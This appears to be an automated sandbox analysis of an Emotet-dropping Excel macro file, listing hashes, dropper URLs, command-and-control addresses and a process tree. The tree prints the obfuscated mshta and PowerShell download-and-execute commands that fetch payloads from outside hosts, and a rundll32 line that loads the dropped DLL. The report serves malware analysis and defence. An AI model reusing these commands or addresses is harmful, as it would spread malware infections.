Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 21:08

General

  • Target

    pau073.xlsm

  • Size

    49KB

  • MD5

    0bd0bb6e3b99c184dc8b8a58d2b5f58d

  • SHA1

    3fec116f481763a3adc7c4afab067ce8e78e7cea

  • SHA256

    5eb512924e585833ee9f0111efd74c3e3ced26d8a78db2b71d87bb6c9f684791

  • SHA512

    2e176bd2e223410b56ff698445963a83d0eaac73ba324f36341e1f8605acfb6730967c76da078b77b8323ba6708b23ce720351870a57ea42a295f91a7754d2ed

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\pau073.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe1.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe1.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:616
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1640
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1788
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:556
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1608
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eejzvelm\uwgqejq.trm",UbqZYnRWMDK
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:828
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eejzvelm\uwgqejq.trm",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1312

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • \Users\Public\Documents\ssd.dll
    MD5

    0fe6e77d37589d3ab2dc51923c1fb906

    SHA1

    d292985fcd5ff945cc5e248f7c461d77286850eb

    SHA256

    f60261bf408c29491c1038f453cffb6ec1899bc61ae1ffc3c7b904a54efd15f3

    SHA512

    97e87f7922d2c92d3e139fd9d1621f0eef42564c3a3bd4c81998049180b8ee9fab82c97135b89e377c95aca7b545f536098c887926b5d836446d38e73662ce31

  • memory/556-70-0x0000000000270000-0x0000000000298000-memory.dmp
    Filesize

    160KB

  • memory/1312-99-0x0000000000A10000-0x0000000000A38000-memory.dmp
    Filesize

    160KB

  • memory/1312-105-0x0000000002490000-0x00000000024B8000-memory.dmp
    Filesize

    160KB

  • memory/1312-97-0x00000000003B0000-0x00000000003D8000-memory.dmp
    Filesize

    160KB

  • memory/1312-95-0x00000000002F0000-0x0000000000318000-memory.dmp
    Filesize

    160KB

  • memory/1312-103-0x0000000002100000-0x0000000002128000-memory.dmp
    Filesize

    160KB

  • memory/1312-107-0x00000000026C0000-0x00000000026E8000-memory.dmp
    Filesize

    160KB

  • memory/1312-113-0x0000000002A20000-0x0000000002A48000-memory.dmp
    Filesize

    160KB

  • memory/1312-111-0x00000000028A0000-0x00000000028C8000-memory.dmp
    Filesize

    160KB

  • memory/1312-109-0x0000000002760000-0x0000000002788000-memory.dmp
    Filesize

    160KB

  • memory/1556-56-0x0000000070E71000-0x0000000070E73000-memory.dmp
    Filesize

    8KB

  • memory/1556-55-0x000000002FC81000-0x000000002FC84000-memory.dmp
    Filesize

    12KB

  • memory/1556-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1556-58-0x00000000756C1000-0x00000000756C3000-memory.dmp
    Filesize

    8KB

  • memory/1556-117-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1608-77-0x0000000000220000-0x0000000000248000-memory.dmp
    Filesize

    160KB

  • memory/1608-90-0x00000000028F0000-0x0000000002918000-memory.dmp
    Filesize

    160KB

  • memory/1608-87-0x0000000002790000-0x00000000027B8000-memory.dmp
    Filesize

    160KB

  • memory/1608-85-0x0000000002680000-0x00000000026A8000-memory.dmp
    Filesize

    160KB

  • memory/1608-83-0x00000000023D0000-0x00000000023F8000-memory.dmp
    Filesize

    160KB

  • memory/1608-79-0x0000000000950000-0x0000000000978000-memory.dmp
    Filesize

    160KB

  • memory/1640-63-0x0000000004C10000-0x0000000005261000-memory.dmp
    Filesize

    6.3MB

  • memory/1640-62-0x0000000002510000-0x000000000315A000-memory.dmp
    Filesize

    12.3MB